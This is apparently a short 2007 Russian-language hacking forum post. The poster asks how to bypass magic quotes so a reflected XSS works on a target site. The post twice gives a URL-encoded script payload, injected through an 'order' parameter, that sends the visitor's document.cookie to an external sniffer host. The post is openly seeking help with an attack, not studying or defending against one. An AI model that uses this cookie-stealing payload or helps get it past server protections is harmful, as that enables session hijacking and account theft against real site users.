x-demon
22.11.2007, 21:04
Короче есть уязвимость. Но на сервере включены magic quotes.
Как обойти? xss пасивная
somesite/?order=%22%3E%3Cscript%3Edocument.location.href=%2 7javascript:http://snfiffaddr.tld/s.gif?%27+document.cookie;%3C/script%3E
Как обойти? xss пасивная
somesite/?order=%22%3E%3Cscript%3Edocument.location.href=%2 7javascript:http://snfiffaddr.tld/s.gif?%27+document.cookie;%3C/script%3E